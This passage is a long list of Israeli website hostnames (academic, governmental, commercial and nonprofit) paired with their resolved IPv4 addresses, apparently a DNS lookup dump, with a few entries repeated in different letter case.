    www.math.technion.ac.il = 132.68.115.2

    www.matimop.org.il = 199.203.207.195

    www.matrix.co.il = 82.80.222.90

    www.maven.co.il = 12.47.45.135

    www.mbachances.co.il = 194.90.8.20

    www.mediatheque.org.il = 194.90.203.78

    www.megido.org.il = 62.219.13.240

    www.meirtv.co.il = 82.80.198.104

    www.mekorot.co.il = 213.8.188.251

    www.melingo.co.il = 212.150.35.67

    www.melta.co.il = 194.90.8.20

    www.meonot.org.il = 80.179.46.130

    www.merchavim.org.il = 212.235.12.184

    www.meteoprog.co.il = 62.244.10.67

    www.meyda.org.il = 82.80.211.80

    www.mfa.gov.il = 147.237.72.235

    www.mgl.org.il = 72.167.232.174

    www.midot.org.il = 82.80.235.46

    www.migdal.co.il = 192.115.252.90

    www.miki.org.il = 194.213.4.28

    www.mikragesher.org.il = 212.143.218.45

    www.mikranet.org.il = 132.64.3.9

    www.milon.co.il = 195.28.181.66

    www.minervaisrael.org.il = 184.154.225.6

    www.mini.co.il = 195.177.34.126

    www.misdar.org.il = 62.90.225.15

    www.misim.gov.il = 147.237.80.2

    www.mla.ac.il = 62.90.225.53

    www.mng.gov.il = 147.237.72.48

    www.moag.gov.il = 147.237.72.38

    www.mobimedia.co.il = 82.166.246.24

    www.moc.gov.il = 80.70.129.253

    www.moch.gov.il = 147.237.77.77

    www.mod.gov.il = 195.160.241.193

    www.mofet.macam.ac.il = 192.115.100.173

    www.mof.gov.il = 147.237.77.33

    www.mohr.gov.il = 147.237.72.71

    www.moia.gov.il = 147.237.76.51

    www.moital.gov.il = 82.166.227.170

    www.moit.gov.il = 82.166.227.170

    www.montefiore.co.il = 80.179.226.18

    www.moomoo.co.il = 82.166.233.152

    www.mops.gov.il = 147.237.77.250

    www.mop-zafon.org.il = 199.203.27.43

    www.morfix.co.il = 46.33.76.18

    www.motke.co.il = 212.179.114.188

    www.motorcycle.org.il = 62.219.78.125

    www.mouse.co.il = 94.127.76.80

    www.mqg.org.il = 199.203.207.216

    www.msr.org.il = 109.226.38.102

    www.mtex.co.il = 212.199.213.79

    www.myavne.co.il = 62.219.1.122

    www.m-yehuda.org.il = 212.150.186.168

    www.myfirsthomepage.co.il = 212.150.36.188

    www.mynadlan.co.il = 62.128.59.221

    www.myv.co.il = 212.199.115.219

    www.nachlat.org.il = 82.80.201.18

    www.nagish.org.il = 212.179.113.206

    www.nanotechnology.org.il = 82.80.244.206

    www.nas.co.il = 194.90.130.65

    www.nbn.org.il = 64.14.72.123

    www.ndi.org.il = 212.235.100.54

    www.neaman.org.il = 212.143.17.175

    www.nechama.org.il = 132.64.3.17

    www.netanyabasketball.co.il = 184.168.192.36

    www.netlaw.co.il = 82.166.246.34

    www.newcourse.co.il = 82.80.224.199

    www.news1.co.il = 81.218.80.226

    www.news.mod.gov.il = 195.160.241.237

    www.newsru.co.il = 174.46.74.5

    www.ngo-monitor.org.il = 67.227.194.200

    www.nite.org.il = 62.0.18.24

    www.noal.org.il = 195.28.180.147

    www.norway.org.il = 81.93.161.85

    www.nova.co.il = 80.70.129.199

    www.nrg.co.il = 94.127.76.180

    www.nzc.org.il = 62.219.25.46

    www.ocean.org.il = 194.90.8.20

    www.ofir.org.il = 82.80.254.215

    www.ohalo.ac.il = 94.245.106.168

    www.ok.co.il = 212.150.36.188

    www.okeanos.co.il = 82.80.210.64

    www.old.health.gov.il = 147.237.72.200

    www.olei.org.il = 68.171.219.156

    www.omemo.co.il = 74.62.152.130

    www.ometz.org.il = 62.219.78.122

    www.onevoice.org.il = 194.0.252.80

    www.onlife.co.il = 94.127.76.190

    www.onlinemarketing.co.il = 80.179.242.244

    www.openu.ac.il = 147.233.250.223

    www.ophir.org.il = 208.109.78.35

    www.orange.co.il = 192.118.8.10

    www.oranim.ac.il = 192.115.88.27

    www.oref.org.il = 46.33.76.82

    www.orgadi.co.il = 81.218.230.244

    www.organic-israel.org.il = 80.179.226.37

    www.oriental-arms.co.il = 67.18.12.2

    www.oryarok.org.il = 213.8.25.92

    www.osg.org.il = 194.213.4.10

    www.oshforum.org.il = 199.203.180.232

    www.oti.co.il = 194.90.30.6

    www.outset.org.il = 62.219.91.154

    www.ovdim.org.il = 80.179.148.121

    www.ozbranding.co.il = 62.219.84.229

    www.pac.ac.il = 62.90.118.210

    www.panim.org.il = 80.179.148.187

    www.passportnews.co.il = 199.83.133.78

    www.pcb.co.il = 194.90.8.20

    www.pcon.co.il = 82.80.210.155

    www.peacenow.org.il = 212.179.115.81

    www.pediatrics.org.il = 212.235.101.104

    www.peeling.co.il = 199.236.111.62

    www.perach.org.il = 212.143.17.173

    www.peri.co.il = 80.244.215.180

    www.petri.co.il = 184.72.55.242

    www.phr.org.il = 195.190.23.40

    www.phys.huji.ac.il = 132.64.80.4

    www.pikiwiki.org.il = 192.115.211.23

    www.pilo.co.il = 89.187.103.119

    www.pionet.co.il = 212.235.25.7

    www.pirsum.gov.il = 147.237.72.184

    www.pitgamim.co.il = 64.251.19.37

    www.piyut.org.il = 132.64.3.9

    www.plastopil.co.il = 62.219.84.229

    www.pmo.gov.il = 147.237.77.193

    www.police.gov.il = 147.237.76.155

    www.polishinstitute.org.il = 195.28.180.122

    www.pools.org.il = 62.128.52.211

    www.poria.health.gov.il = 62.90.225.68

    www.posta.co.il = 62.219.69.75

    www.president.gov.il = 147.237.77.108

    www.prnewswire.co.il = 95.140.237.128

    www.probook.co.il = 62.219.10.152

    www.protonet.cs.huji.ac.il = 132.65.20.100

    www.psagot.co.il = 212.143.88.177

    www.psi.org.il = 192.115.31.19

    www.qsm.ac.il = 192.115.100.171

    www.qsm.co.il = 216.104.169.46

    www.raanana.org.il = 147.236.237.170

    www.rabincenter.org.il = 213.8.142.70

    www.rabin.eduportal.org.il = 212.179.114.226

    www.raddar.co.il = 212.29.210.111

    www.radix.co.il = 91.193.50.66

    www.rafael.co.il = 193.169.70.66

    www.rail.co.il = 194.90.96.1

    www.rambam.org.il = 213.8.142.72

    www.rambish.org.il = 62.219.7.10

    www.ramonhotel.co.il = 212.179.114.123

    www.rashi.org.il = 212.179.114.51

    www.rashut2.org.il = 212.150.52.226

    www.ravmilim.co.il = 212.150.35.67

    www.realestatetoday.co.il = 82.80.221.158

    www.reg.co.il = 212.150.35.132

    www.rehouse.co.il = 88.198.74.214

    www.responsa.co.il = 62.0.51.46

    www.restaurants-in-israel.co.il = 199.203.242.71

    www.reuters.co.il = 199.203.150.170

    www.reuth-mc.org.il = 199.203.20.81

    www.rh.co.il = 62.0.66.12

    www.rlive.co.il = 212.150.158.20

    www.rmmj.org.il = 195.190.23.26

    www.roberto.co.il = 212.199.167.55

    www-r.openu.ac.il = 147.233.250.195

    www.rsa.gov.il = 147.237.76.49

    www.rubyunderground.co.il = 54.243.165.148

    www.rup.co.il = 62.90.141.123

    www.sabeel.co.il = 199.203.51.80

    www.sadna.co.il = 62.90.175.154

    www.safed.co.il = 208.113.57.104

    www.safeguard.co.il = 66.147.244.131

    www.safis.co.il = 212.199.213.59

    www.safsal.co.il = 212.179.114.167

    www.sanofi.co.il = 212.121.182.101

    www.sce.ac.il = 62.219.86.50

    www.schatz.co.il = 65.181.130.209

    www.schneider-electric.co.il = 46.33.76.43

    www.schocken-jts.org.il = 173.0.138.89

    www.science.co.il = 66.206.19.217

    www.scrabble.org.il = 75.98.17.73

    www.sdotnegev.org.il = 147.236.237.102

    www.seatransport.co.il = 66.154.51.65

    www.se.bgu.ac.il = 132.72.41.238

    www.secureisrael.org.il = 62.116.181.25

    www.securityacademy.org.il = 72.167.131.157

    www.sela.org.il = 80.179.148.186

    www.seligman.org.il = 74.209.215.5

    www.semicomlexis.co.il = 195.28.180.70

    www.seret.co.il = 213.8.172.187

    www.shabak.gov.il = 147.237.72.77

    www.shaffir.org.il = 91.202.171.113

    www.shaham.moag.gov.il = 147.237.72.37

    www.shaharit.org.il = 84.94.227.28

    www.shalag.co.il = 62.128.50.17

    www.shallem.org.il = 62.90.118.210

    www.shasnet.org.il = 62.219.197.36

    www.shatil.org.il = 80.179.24.50

    www.sheatufim.org.il = 82.80.247.35

    www.shelly.org.il = 208.116.36.105

    www.shimur.org.il = 128.121.143.177

    www.shituf.gov.il = 147.237.77.27

    www.shoresh.org.il = 80.179.147.211

    www.sibat.mod.gov.il = 195.160.241.194

    www.sinai.org.il = 66.147.244.65

    www-sipl.technion.ac.il = 132.68.58.53

    www.skin.org.il = 62.90.134.178

    www.smallbama.co.il = 82.80.232.249

    www.sng.org.il = 62.219.13.240

    www.socialwork.org.il = 62.219.19.60

    www.socialwork.tau.ac.il = 132.66.102.74

    www.softense.co.il = 80.179.226.44

    www.sosna.co.il = 69.73.188.100

    www.souz.co.il = 62.90.26.219

    www.spirala.org.il = 62.219.100.201

    www.sponser.co.il = 62.90.188.103

    www.sporta.co.il = 82.80.223.178

    www.sportramat-hasharon.org.il = 62.90.225.104

    www.sratim.co.il = 50.62.136.17

    www.srugim.co.il = 80.179.74.69

    www.sslint.co.il = 62.90.118.250

    www.standwithus.co.il = 62.219.30.30

    www.stat.huji.ac.il = 132.64.178.195

    www.stggroup.co.il = 212.143.126.154

    www.stoptorture.org.il = 69.163.144.82

    www.study.org.il = 212.199.184.221

    www.superbus.co.il = 82.166.233.139

    www.suzannedellal.org.il = 62.90.225.109

    www.sviva.gov.il = 147.237.77.18

    www.taasuka.gov.il = 147.237.72.134

    www.tabar.org.il = 82.80.223.94

    www.taburit.co.il = 62.90.141.6

    www.tag.co.il = 212.143.142.40

    www.takdin.co.il = 192.114.70.113

    www.tale.co.il = 66.147.244.185

    www.talkreviews.co.il = 64.188.59.239

    www.talmidi.co.il = 213.175.198.100

    www.talniri.co.il = 194.90.130.169

    www.tamas.gov.il = 82.166.227.170

    www.tamirkfir.co.il = 80.179.148.101

    www.tamuseum.org.il = 62.219.78.67

    www.tapuz.co.il = 212.150.54.150

    www.tarbut.org.il = 82.166.0.106

    www.tase.co.il = 95.101.135.55

    www.tasmc.org.il = 192.114.23.20

    www.tau.ac.il = 132.66.16.6

    www.taya.co.il = 212.199.213.192

    www.tazkirim.gov.il = 147.237.77.104

    www.tch.netanya-edu.org.il = 212.179.114.226

    www.technion.ac.il = 132.68.1.192

    www.techtime.co.il = 199.27.135.154

    www.tel-aviv.gov.il = 212.150.26.45

    www.telavivhotels.org.il = 64.90.43.151

    www.telaviv.police.gov.il = 147.237.72.94

    www.telesport.co.il = 109.226.39.21

    www.telfed.org.il = 69.61.20.50

    www.telhai.ac.il = 192.115.130.1

    www.telsys.co.il = 195.190.23.231

    www.terrorism-info.org.il = 192.117.187.35

    www.teuza.co.il = 173.201.216.94

    www.teva.co.il = 192.115.248.118

    www.teva.org.il = 82.166.151.62

    www.tgspot.co.il = 173.194.67.121

    www.the7eye.org.il = 212.150.81.195

    www.theappraiser.co.il = 118.139.160.195

    www.theatrolli.co.il = 62.219.69.75

    www.thebigbro.co.il = 62.128.59.182

    www.theiphoner.co.il = 212.29.236.33

    www.theshuk.co.il = 195.28.181.222

    www.thevoiceofpeace.co.il = 96.0.68.89

    www.ticketnet.co.il = 213.8.108.171

    www.tikshuv.org.il = 195.28.181.188

    www.tipo.co.il = 213.8.138.44

    www.tiran.co.il = 199.203.20.149

    www.tiroche.co.il = 212.150.52.122

    www.tis.co.il = 212.113.150.153

    www.tlvcitykids.co.il = 64.90.46.114

    www.tmoshavim.org.il = 199.203.180.232

    www.tmu-na.org.il = 62.90.118.250

    www.tnet.org.il = 212.179.114.168

    www.topbuy.co.il = 85.17.88.169

    www.tora-manhiga.org.il = 69.42.90.132

    www.tour-haifa.co.il = 80.179.226.18

    www.tourism.gov.il = 62.90.75.68

    www.touryoav.org.il = 91.202.171.108

    www.trance.org.il = 80.179.179.130

    www.travelhotels.co.il = 80.179.226.18

    www.trdf.co.il = 195.28.180.14

    www.triathlon.org.il = 80.179.179.74

    www.tritech.co.il = 195.28.180.114

    www.tyco.co.il = 212.199.222.92

    www.tzavpius.org.il = 91.228.127.162

    www.unibaam.tau.ac.il = 132.66.252.135

    www.universities-colleges.org.il = 192.116.71.151

    www.use.co.il = 84.45.45.106

    www.utzgroup.co.il = 5.9.111.157

    www.uxstorytelling.co.il = 212.199.197.123

    www.vaad-wgh.org.il = 212.29.199.37

    www.vaniglia.co.il = 82.80.221.158

    www.vanleer.org.il = 82.80.247.40

    www.vatil.org.il = 85.25.39.68

    www.vetserv.moag.gov.il = 147.237.72.38

    www.voices.org.il = 80.179.37.109

    www.volle.co.il = 95.175.32.10

    www.walla.co.il = 192.118.82.140

    www.wallashops.co.il = 192.118.83.2

    www.washington.ac.il = 192.115.100.129

    www.webangel.co.il = 82.80.211.150

    www.weizmann.ac.il = 132.76.150.57

    www.whatsup.org.il = 192.117.122.148

    www.whois.co.il = 81.218.214.143

    www.wildflowers.co.il = 62.219.90.106

    www.wildlife-hospital.org.il = 81.218.229.243

    www.willi-food.co.il = 195.28.180.198

    www.wisdom.weizmann.ac.il = 132.76.150.57

    www.womeningreen.org.il = 66.96.146.102

    www.working.org.il = 82.80.211.80

    www.wujs.org.il = 208.43.2.244

    www.wzo.org.il = 212.199.115.173

    www.yad2.co.il = 212.29.254.196

    www.yadhanadiv.org.il = 188.138.96.240

    www.yadsarah.org.il = 213.151.33.64

    www.yardenit.co.il = 212.29.205.60

    www.yazamut.technion.ac.il = 62.90.141.80

    www.ybz.org.il = 62.90.118.164

    www.yeshiva.org.il = 81.218.249.60

    www.yissum.co.il = 62.219.14.110

    www.ykm.co.il = 212.25.76.97

    www.youngjudaea.org.il = 199.203.20.224

    www.yourway.co.il = 50.97.251.120

    www.ytem.co.il = 217.194.194.245

    www.zag.co.il = 204.86.209.17

    www.zehuze.co.il = 204.74.99.100

    www.zepo.co.il = 62.219.23.24

    www.zimerim.org.il = 80.179.155.190

    www.zimmer.co.il = 212.143.37.69

    www.zimmerim.org.il = 212.199.182.70

    www.zinuk.org.il = 62.219.50.126

    www.ziur.co.il = 212.199.42.161

    www.zofim.org.il = 199.203.207.240

    www.zoko.co.il = 212.179.114.51

    www.zoomap.co.il = 82.80.254.47

    www.zsc.co.il = 213.186.33.4

    www.zutar.org.il = 82.166.184.77

    88fm.iba.org.il = 212.143.64.150

    abubasma.org.il = 62.128.52.102

    academicity.org.il = 80.244.168.34

    academic-secretary.huji.ac.il = 132.64.3.138

    accessibility.huji.ac.il = 132.64.3.94

    acg.cs.tau.ac.il = 132.67.252.237

    actveng.haifa.ac.il = 132.74.1.153

    adfs2.matimop.org.il = 91.143.232.236

    agenda.org.il = 62.219.13.240

    agri-sensing.technion.ac.il = 132.68.1.192

    aguda.org.il = 82.80.235.50

    aleph3.libnet.ac.il = 128.139.225.20

    aleph.iba.org.il = 212.143.64.150

    alephprd.tau.ac.il = 132.66.11.14

    allsearch.co.il = 212.199.136.51

    almnar.co.il = 194.90.177.136

    alpha.ch.huji.ac.il = 132.64.98.61

    amitay.haifa.ac.il = 132.74.10.63

    amsalem.co.il = 212.235.42.51

    anglodeals.co.il = 195.28.181.222

    anonymous.org.il = 91.193.50.46

    antisemitism.org.il = 192.116.71.182

    apho2011.tau.ac.il = 132.66.102.31

    app.shaanan.ac.il = 192.115.100.166

    arabic.iba.org.il = 212.143.64.150

    arb.daam.org.il = 184.173.208.191

    architecture.org.il = 64.202.163.76

    architecture.technion.ac.il = 132.68.238.44

    ard.huji.ac.il = 132.64.3.82

    arielrubinstein.tau.ac.il = 132.66.17.40

    artdealer.co.il = 82.166.192.29

    artori.co.il = 199.188.206.54

    arts.tau.ac.il = 132.66.17.67

    ashdod10.co.il = 81.218.93.178

    asonot.org.il = 198.58.84.196

    astroclub.tau.ac.il = 132.66.135.14

    astroforum.org.il = 192.116.109.70

    babyshape.co.il = 62.219.83.25

    baku.mfa.gov.il = 147.237.76.32

    bar-ilan.haaretz.co.il = 195.28.180.138

    barkai-serv.weizmann.ac.il = 132.77.150.80

    bat-ami.org.il = 199.203.120.34

    bemosa.blogspot.co.il = 173.194.35.42

    bet.iba.org.il = 212.143.64.150

    bgu.ac.il = 132.72.126.91

    bike.galil.gov.il = 62.0.95.154

    bioethics.academy.ac.il = 82.80.227.167

    biotech.technion.ac.il = 132.68.238.44

    birdsong.co.il = 78.47.243.86

    biztec.org.il = 62.219.7.19

    blog.israelidiamond.co.il = 212.25.72.184

    blogs.microsoft.co.il = 72.15.222.207

    blog.telhai.ac.il = 192.116.109.79

    bns.org.il = 82.166.80.14

    bondiss.mof.gov.il = 147.237.72.104

    BookmarkThis.co.il = 66.40.52.11

    books.google.co.il = 173.194.35.46

    boston.mfa.gov.il = 147.237.76.32

    brain.huji.ac.il = 132.64.170.14

    brojde.huji.ac.il = 132.64.3.71

    bschool.huji.ac.il = 132.64.178.155

    cafe.mouse.co.il = 94.127.76.80

    campus.tcb.ac.il = 212.179.163.79

    carmel.ac.il = 62.90.225.61

    carmenmiranda.co.il = 182.50.149.1

    catalog.cet.ac.il = 62.219.59.138

    cert.gov.il = 147.237.77.120

    ceweb.technion.ac.il = 132.68.238.44

    cfe.org.il = 213.8.108.100

    chemistry.tau.ac.il = 132.66.17.67

    che.org.il = 91.228.127.59

    ciar.technion.ac.il = 132.68.238.44

    citizenship.cet.ac.il = 62.219.59.149

    cms.education.gov.il = 81.218.97.80

    cmsprod.bgu.ac.il = 132.72.126.91

    commonground.cet.ac.il = 62.219.59.138

    communication.haifa.ac.il = 132.74.72.29

    complain.haifa.ac.il = 132.74.1.85

    courses.aviv.org.il = 62.0.192.37

    cs.co.il = 69.163.178.74

    cs.haifa.ac.il = 132.74.120.2

    ctc.gbrener.org.il = 212.150.112.79

    ctprr.haifa.ac.il = 132.74.1.153

    dafyomi.shemayisrael.co.il = 209.188.92.45

    dalet.iba.org.il = 212.143.64.150

    da.maccabi-health.co.il = 91.199.69.210

    danybarshay.co.il = 50.22.108.63

    data.gov.il = 147.237.77.27

    data.isoc.org.il = 192.115.211.40

    davidson.weizmann.ac.il = 132.76.150.57

    daycamps.ramah.org.il = 62.90.247.226

    dekanat.haifa.ac.il = 132.74.6.107

    dental.huji.ac.il = 132.64.170.14

    derech.zofim.org.il = 199.203.207.240

    dev.linux.ort.org.il = 62.0.237.176

    digitool.haifa.ac.il = 132.74.189.209

    dinnersite.co.il = 195.69.74.18

    dissertationwriting.koral.co.il = 62.219.197.36

    dor.huji.ac.il = 132.64.178.195

    dory.os.biu.ac.il = 132.70.60.47

    drybonesblog.blogspot.co.il = 173.194.35.43

    duns100.dundb.co.il = 212.143.96.132

    ecom.gov.il = 147.237.72.51

    economics.huji.ac.il = 132.64.178.195

    econ.tau.ac.il = 132.66.97.184

    edu.technion.ac.il = 132.68.98.220

    eec.idc.ac.il = 212.179.58.111

    elearning-moodle.smkb.ac.il = 192.115.88.26

    elecomp.cet.ac.il = 62.219.59.149

    ella.sheba.co.il = 109.226.38.102

    elsc.huji.ac.il = 132.64.61.142

    elyon1.court.gov.il = 212.179.159.158

    elyon2.court.gov.il = 212.179.159.159

    embassies.gov.il = 147.237.77.225

    en.dinnersite.co.il = 195.69.74.18

    energy.gov.il = 147.237.76.20

    eng.israports.co.il = 193.254.206.39

    english.b144.co.il = 147.235.246.154

    english.leumi.co.il = 212.179.26.43

    english.tamareshotels.co.il = 82.80.225.208

    english.tau.ac.il = 132.66.11.30

    eng.sheba.co.il = 109.226.38.102

    en.idi.org.il = 212.29.205.74

    en.meitav.co.il = 213.8.193.220

    en.mot.gov.il = 80.179.244.171

    en.photolight.co.il = 62.90.26.222

    en.shikunbinui.co.il = 212.235.25.10

    en.targumon.co.il = 80.244.168.8

    eretz.teva.org.il = 82.80.232.234

    essayproviders.tv4u.co.il = 62.219.197.36

    events-tce.technion.ac.il = 132.68.49.14

    evforum.co.il = 182.54.236.14

    ewsite.co.il = 95.211.74.130

    exactsci-info.tau.ac.il = 132.66.138.80

    experiments.huji.ac.il = 132.64.178.201

    eyarok.org.il = 75.101.145.103

    e.yeshiva.org.il = 81.218.249.60

    familyguy.tv4u.co.il = 62.219.197.36

    filmfund.org.il = 212.179.115.50

    flora.huji.ac.il = 132.64.68.7

    fohs.bgu.ac.il = 132.72.73.210

    food101.co.il = 108.162.199.99

    football.org.il = 212.29.210.67

    fresh-news-papers-writing.tv4u.co.il = 62.219.197.36

    friends.walla.co.il = 192.118.82.160

    frodo.cs.bgu.ac.il = 132.72.41.75

    ftp.soreq-ndc.gov.il = 192.115.64.1

    futuretxtbook.cettalk.co.il = 194.90.105.199

    games.webvision.co.il = 5.100.249.20

    gametheory.tau.ac.il = 132.66.33.6

    gaycenter.org.il = 82.80.201.25

    geffenmedical.co.il = 212.150.186.191

    gemelnet.mof.gov.il = 147.237.72.78

    genecards.weizmann.ac.il = 132.77.150.100

    genie.weizmann.ac.il = 132.77.150.113

    geodep.haifa.ac.il = 132.74.72.42

    geo-ofakim.cet.ac.il = 62.219.59.149

    geophysics.tau.ac.il = 132.66.17.67

    getapp.co.il = 62.128.52.185

    gifted.cet.ac.il = 62.219.59.149

    gilead.org.il = 152.19.134.41

    gimmel.iba.org.il = 212.143.64.150

    glocal.huji.ac.il = 132.64.178.201

    glz.co.il = 82.80.222.67

    GoIsrael.co.il = 198.66.229.169

    gov.il = 147.237.72.69

    grades.cs.technion.ac.il = 132.68.32.250

    greenwin.kkl.org.il = 192.114.182.153

    GROUPON.co.il = 91.108.184.84

    gsb.haifa.ac.il = 132.74.72.21

    gtep.technion.ac.il = 132.68.238.44

    gvahim.org.il = 212.143.39.249

    gwri-ic.technion.ac.il = 132.68.226.240

    gwri.technion.ac.il = 132.68.226.240

    hadash.org.il = 192.115.31.21

    hagada.org.il = 82.166.80.246

    hakaveret.org.il = 178.79.168.75

    hamakor.org.il = 82.166.80.233

    hamishmar.org.il = 182.54.236.14

    handesaim.shenkar.ac.il = 193.105.99.162

    harif.co.il = 212.150.53.118

    hasa.co.il = 82.166.144.44

    havot.org.il = 212.143.218.45

    havruta.org.il = 74.50.10.25

    hbmi.co.il = 192.117.172.20

    hebrew-multimedia.huji.ac.il = 132.64.178.201

    hevra.haifa.ac.il = 132.74.72.5

    highlearn2002.cet.ac.il = 62.219.59.149

    highlearn.afeka.ac.il = 212.199.96.137

    highmath.haifa.ac.il = 132.74.1.153

    hii.co.il = 174.121.218.155

    historic-cities.huji.ac.il = 132.64.178.155

    hl2.biu.ac.il = 132.70.13.21

    holocaust-studies.haifa.ac.il = 132.74.1.153

    httpdyn.cs.huji.ac.il = 132.65.16.113

    hufind.huji.ac.il = 132.64.3.53

    humanities.tau.ac.il = 132.66.102.56

    hw2.haifa.ac.il = 132.74.1.153

    hw.haifa.ac.il = 132.74.1.153

    hyde.eng.tau.ac.il = 132.66.50.47

    hy.health.gov.il = 62.90.225.104

    icdb.co.il = 75.119.205.213

    icsep.org.il = 63.247.133.101

    ie.technion.ac.il = 132.68.160.4

    iew3.technion.ac.il = 132.68.160.12

    iframe.gov.il = 147.237.77.16

    igdc.huji.ac.il = 132.64.178.70

    il4u.org.il = 212.179.115.55

    imba.tau.ac.il = 132.66.102.29

    img2.tapuz.co.il = 212.150.36.138

    in.bgu.ac.il = 132.72.126.88

    indymedia.org.il = 82.94.251.230

    infocenter.macam.ac.il = 192.115.100.178

    info.jamd.ac.il = 194.90.15.69

    infsrv.mot.gov.il = 199.203.58.11

    inspire.nbn.org.il = 64.14.72.123

    investors.ircellcom.co.il = 206.200.251.19

    irrelevant.org.il = 69.163.170.153

    isblog.mta.ac.il = 173.194.67.121

    isdc.huji.ac.il = 132.64.178.195

    israel365.co.il = 23.23.219.65

    israel-business.dundb.co.il = 212.179.19.18

    israel.cet.ac.il = 62.219.59.149

    israelgateway.co.il = 212.29.236.24

    israelmatzav.blogspot.co.il = 173.194.35.43

    israel-stu.haifa.ac.il = 132.74.76.6

    israelway.org.il = 194.90.224.190

    israelwebdesign.co.il = 206.212.255.66

    it.jce.ac.il = 62.90.88.26

    itrade.gov.il = 212.199.114.72

    itu.cet.ac.il = 62.219.59.149

    ivolunteer.org.il = 62.90.118.140

    ivrit.cet.ac.il = 62.219.59.149

    izrael.org.il = 85.128.221.51

    izrus.co.il = 62.90.26.221

    Izrus.co.il = 62.90.26.221

    izrus.co.il = 62.90.26.221

    Izrus.co.il = 62.90.26.221

    izrus.co.il = 62.90.26.221

    Izrus.co.il = 62.90.26.221

    j14.org.il = 212.199.184.102

    jic.tau.ac.il = 132.66.32.37

    jnews.co.il = 212.150.122.11

    jnul.huji.ac.il = 132.64.3.72

    jobmob.co.il = 184.72.32.149

    jobresume.haifa.ac.il = 132.74.1.153

    jspca.org.il = 50.116.76.37

    jv.gilead.org.il = 152.19.134.41

    k12.shenkar.ac.il = 192.117.150.237

    kantorcenter.tau.ac.il = 132.66.102.92

    karmiel.usac.org.il = 194.90.114.101

    kdam.haifa.ac.il = 132.74.1.153

    kehilotsharot.org.il = 174.120.151.126

    keshetfamilies.org.il = 74.200.244.59

    kids.gov.il = 80.179.131.106

    kolhanegev.sapir.ac.il = 62.219.100.52

    kuwari.tau.ac.il = 132.66.152.181

    lang.haifa.ac.il = 132.74.76.6

    law.biu.ac.il = 132.70.61.35

    law.huji.ac.il = 132.64.178.201

    legalize.org.il = 78.47.243.86

    lekohot.co.il = 82.166.13.197

    lektor.co.il = 31.24.209.67

    lib-authority.huji.ac.il = 132.64.178.201

    libguides.bgu.ac.il = 174.132.16.38

    lib.haifa.ac.il = 132.74.59.154

    liblog.haifa.ac.il = 132.74.59.154

    library.sheba.co.il = 109.226.38.102

    library.technion.ac.il = 132.68.4.50

    lib.sasa.org.il = 212.150.112.147

    Liga.co.il = 81.218.249.12

    ling.huji.ac.il = 132.64.178.201

    liorbenhur.sharatim.org.il = 178.32.8.140

    list.haifa.ac.il = 132.74.1.221

    listserv.tau.ac.il = 132.66.17.19

    longitude.weizmann.ac.il = 132.77.150.88

    maamul.sapir.ac.il = 62.219.100.52

    machat.co.il = 108.179.201.122

    mad.co.il = 75.30.117.139

    main.knesset.gov.il = 82.166.34.167

    maki.org.il = 192.115.31.21

    malam.cet.ac.il = 62.219.59.138

    mama.mta.ac.il = 192.116.64.10

    maor.iucc.ac.il = 128.139.202.47

    mars.netanya.ac.il = 192.118.100.250

    mashav.mfa.gov.il = 212.143.236.4

    math.haifa.ac.il = 132.74.10.59

    mathroom.technion.ac.il = 132.68.160.12

    maya.tase.co.il = 80.239.171.163

    mba.technion.ac.il = 132.68.160.12

    md.technion.ac.il = 213.8.145.153

    media.huji.ac.il = 132.64.3.20

    media.iba.org.il = 212.143.64.150

    mediaserver.cet.ac.il = 62.219.59.132

    medicine.biu.ac.il = 132.70.61.35

    medicine.tau.ac.il = 132.66.17.67

    medlaw.haifa.ac.il = 132.74.1.30

    medlib.tau.ac.il = 132.66.252.124

    meetup.rubyunderground.co.il = 38.123.132.30

    melton.huji.ac.il = 132.64.178.95

    meyda.education.gov.il = 81.218.94.139

    m.google.co.il = 209.85.148.193

    mida.org.il = 192.115.76.53

    midreshet.org.il = 62.219.59.149

    MINI.co.il = 195.177.34.126

    mirror.hamakor.org.il = 82.80.248.176

    mirror.isoc.org.il = 192.115.211.70

    MisterTicket.co.il = 80.244.175.37

    misterticket.co.il = 80.244.175.37

    MisterTicket.co.il = 80.244.175.37

    misterticket.co.il = 80.244.175.37

    MisterTicket.co.il = 80.244.175.37

    misterticket.co.il = 80.244.175.37

    miw.co.il = 82.166.190.190

    ml.technion.ac.il = 132.68.48.23

    mobility.technion.ac.il = 132.68.238.44

    moked.iba.org.il = 212.143.64.150

    money.ort.org.il = 62.0.192.63

    moodle2.bgu.ac.il = 132.72.126.27

    moodle.cs.huji.ac.il = 132.65.80.3

    moodle.huji.ac.il = 132.65.16.90

    moodle.jamd.ac.il = 80.179.149.234

    moodle.sapir.ac.il = 62.219.100.45

    moodle.technion.ac.il = 132.68.239.23

    mops.gov.il = 147.237.77.250

    most.gov.il = 147.237.76.204

    msradio.huji.ac.il = 132.64.178.155

    muddle.cs.huji.ac.il = 132.65.16.90

    musaf.bac.org.il = 91.228.127.162

    muse.tau.ac.il = 132.66.17.40

    mushecht.haifa.ac.il = 132.74.1.85

    mvofakim.cet.ac.il = 62.219.59.138

    mzb.biu.ac.il = 132.70.61.35

    nechim.amuta.org.il = 62.219.197.36

    neuroscience.technion.ac.il = 132.68.238.44

    nevzlin.huji.ac.il = 132.64.178.195

    newmedia-eng.haifa.ac.il = 132.74.1.153

    news.evp.org.il = 68.171.208.246

    news.galim.org.il = 132.64.3.17

    NEWSru.co.il = 174.46.74.5

    news.startpage.co.il = 5.10.76.195

    new.tau.ac.il = 132.66.11.111

    nmrlab.technion.ac.il = 132.68.238.44

    nssc.haifa.ac.il = 132.74.1.85

    ofek.cet.ac.il = 62.219.59.149

    ogen.cet.ac.il = 62.219.59.138

    old.immobilier.co.il = 91.121.45.79

    old.justice.gov.il = 147.237.72.56

    old.mofet.macam.ac.il = 192.115.100.168

    old.moia.gov.il = 147.237.72.234

    old.sviva.gov.il = 147.237.72.129

    oliverut.blogs.org.il = 82.80.209.226

    onlineachva.macam.ac.il = 192.115.100.172

    online.dyellin.ac.il = 192.115.100.135

    online.efrata.ac.il = 192.115.100.135

    online.gordon.ac.il = 192.115.100.135

    online.haifa.ac.il = 132.74.10.63

    online.hemdat.ac.il = 192.115.100.135

    OnlineMarketing.co.il = 80.179.242.244

    online.ohalo.ac.il = 192.115.100.135

    online.shaanan.ac.il = 192.115.100.135

    online.talpiot.ac.il = 192.115.100.135

    online.washington.ac.il = 192.115.100.135

    orion.mscc.huji.ac.il = 132.64.178.155

    ort.org.il = 62.0.192.104

    ottawa.mfa.gov.il = 147.237.76.32

    otto-loewi-center.huji.ac.il = 132.64.3.71

    ovdim.technion.ac.il = 132.68.238.44

